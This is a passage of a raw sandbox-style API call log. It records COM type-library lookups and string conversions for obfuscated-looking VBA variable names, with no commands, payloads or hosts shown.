ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.838] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.838] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61052 | out: _Dst=0x67c2d40) returned 0x0 [0068.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uABoA4A") returned 0x10c2ef [0068.838] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_uABoA4A" | out: _Dst="_B_var_uABoA4A") returned 0x0 [0068.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_uABoA4A") returned 15 [0068.838] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.838] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uABoA4A", lHashVal=0x10c2ef, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.838] IUnknown:Release (This=0x665ba50) returned 0xd [0068.838] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.838] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uABoA4A", lHashVal=0x10c2ef, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.838] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.838] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.838] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uABoA4A", lHashVal=0x10c2ef, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.838] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.838] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.838] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uABoA4A", lHashVal=0x10c2ef, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.838] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.838] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.838] IUnknown:Release (This=0x665ba50) returned 0xd [0068.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2a4a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_uABoA4A") returned 15 [0068.838] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uABoA4A", lHashVal=0x10c2ef, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0) returned 0x0 [0068.838] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61052 | out: _Dst=0x144ec0) returned 0x0 [0068.838] ITypeComp:RemoteBind (in: This=0x665ba60, szName="QABAA4ZA", lHashVal=0x10451d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="QABAA4ZA") returned 9 [0068.838] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="QABAA4ZA", lHashVal=0x10451d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="QABAA4ZA") returned 9 [0068.839] ITypeComp:RemoteBind (in: This=0x665bd30, szName="QABAA4ZA", lHashVal=0x10451d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QABAA4ZA") returned 0x10451d [0068.839] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="QABAA4ZA" | out: _Dst="QABAA4ZA") returned 0x0 [0068.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="QABAA4ZA") returned 9 [0068.839] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.839] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="QABAA4ZA", lHashVal=0x10451d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.839] IUnknown:Release (This=0x665ba50) returned 0xd [0068.839] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.839] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="QABAA4ZA", lHashVal=0x10451d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.839] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.839] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.839] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="QABAA4ZA", lHashVal=0x10451d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.839] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.839] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.839] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="QABAA4ZA", lHashVal=0x10451d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.839] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610ce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="QABAA4ZA") returned 9 [0068.839] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="QABAA4ZA", lHashVal=0x10451d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.839] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.839] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a610ce | out: _Dst=0x67c2d40) returned 0x0 [0068.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_QABAA4ZA") returned 0x101ca6 [0068.839] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_QABAA4ZA" | out: _Dst="_B_var_QABAA4ZA") returned 0x0 [0068.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_QABAA4ZA") returned 16 [0068.839] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.839] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_QABAA4ZA", lHashVal=0x101ca6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.840] IUnknown:Release (This=0x665ba50) returned 0xd [0068.840] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.840] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_QABAA4ZA", lHashVal=0x101ca6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.840] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.840] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.840] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_QABAA4ZA", lHashVal=0x101ca6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.840] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.840] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.840] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_QABAA4ZA", lHashVal=0x101ca6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.840] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.840] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.840] IUnknown:Release (This=0x665ba50) returned 0xd [0068.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2a7a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_QABAA4ZA") returned 16 [0068.840] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_QABAA4ZA", lHashVal=0x101ca6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.840] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a610ce | out: _Dst=0x144ec0) returned 0x0 [0068.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pXXwAZwG") returned 9 [0068.840] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pXXwAZwG", lHashVal=0x108ddf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pXXwAZwG") returned 9 [0068.840] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pXXwAZwG", lHashVal=0x108ddf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pXXwAZwG") returned 9 [0068.840] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pXXwAZwG", lHashVal=0x108ddf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pXXwAZwG") returned 0x108ddf [0068.841] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="pXXwAZwG" | out: _Dst="pXXwAZwG") returned 0x0 [0068.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="pXXwAZwG") returned 9 [0068.841] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.841] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pXXwAZwG", lHashVal=0x108ddf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.841] IUnknown:Release (This=0x665ba50) returned 0xd [0068.841] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.841] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pXXwAZwG", lHashVal=0x108ddf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.841] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.841] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.841] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pXXwAZwG", lHashVal=0x108ddf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.841] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.841] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.841] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pXXwAZwG", lHashVal=0x108ddf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.841] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a610fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="pXXwAZwG") returned 9 [0068.841] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pXXwAZwG", lHashVal=0x108ddf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.841] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.841] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a610fa | out: _Dst=0x67c2d40) returned 0x0 [0068.841] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pXXwAZwG") returned 0x106568 [0068.841] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_pXXwAZwG" | out: _Dst="_B_var_pXXwAZwG") returned 0x0 [0068.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_pXXwAZwG") returned 16 [0068.841] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.841] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pXXwAZwG", lHashVal=0x106568, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.841] IUnknown:Release (This=0x665ba50) returned 0xd [0068.841] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.841] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pXXwAZwG", lHashVal=0x106568, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.841] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.841] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.842] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pXXwAZwG", lHashVal=0x106568, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.842] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.842] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.842] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pXXwAZwG", lHashVal=0x106568, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.842] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.842] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.842] IUnknown:Release (This=0x665ba50) returned 0xd [0068.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2aaa, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_pXXwAZwG") returned 16 [0068.842] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pXXwAZwG", lHashVal=0x106568, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0) returned 0x0 [0068.842] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a610fa | out: _Dst=0x144ec0) returned 0x0 [0068.842] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zD1441UA", lHashVal=0x10fda7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61126, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zD1441UA") returned 9 [0068.842] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zD1441UA", lHashVal=0x10fda7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61126, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zD1441UA") returned 9 [0068.842] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zD1441UA", lHashVal=0x10fda7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zD1441UA") returned 0x10fda7 [0068.842] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="zD1441UA" | out: _Dst="zD1441UA") returned 0x0 [0068.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="zD1441UA") returned 9 [0068.842] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.842] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zD1441UA", lHashVal=0x10fda7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.842] IUnknown:Release (This=0x665ba50) returned 0xd [0068.842] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.842] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zD1441UA", lHashVal=0x10fda7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.842] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.843] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.843] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zD1441UA", lHashVal=0x10fda7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.843] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.843] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.843] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zD1441UA", lHashVal=0x10fda7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.843] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61126, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zD1441UA") returned 9 [0068.843] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zD1441UA", lHashVal=0x10fda7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.843] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.843] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61126 | out: _Dst=0x67c2d40) returned 0x0 [0068.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zD1441UA") returned 0x10d530 [0068.843] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_zD1441UA" | out: _Dst="_B_var_zD1441UA") returned 0x0 [0068.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_zD1441UA") returned 16 [0068.843] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.843] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zD1441UA", lHashVal=0x10d530, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.843] IUnknown:Release (This=0x665ba50) returned 0xd [0068.843] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.843] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zD1441UA", lHashVal=0x10d530, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.843] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.843] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.843] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zD1441UA", lHashVal=0x10d530, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.843] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.843] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.843] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zD1441UA", lHashVal=0x10d530, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.843] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.843] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.843] IUnknown:Release (This=0x665ba50) returned 0xd [0068.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2ada, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_zD1441UA") returned 16 [0068.843] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zD1441UA", lHashVal=0x10d530, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x34003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x34003400000000, pDummy=0x0) returned 0x0 [0068.843] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61126 | out: _Dst=0x144ec0) returned 0x0 [0068.843] ITypeComp:RemoteBind (in: This=0x665ba60, szName="UZBAAAk", lHashVal=0x1028fe, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61152, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="UZBAAAk") returned 8 [0068.844] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="UZBAAAk", lHashVal=0x1028fe, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61152, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="UZBAAAk") returned 8 [0068.844] ITypeComp:RemoteBind (in: This=0x665bd30, szName="UZBAAAk", lHashVal=0x1028fe, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UZBAAAk") returned 0x1028fe [0068.844] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="UZBAAAk" | out: _Dst="UZBAAAk") returned 0x0 [0068.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: 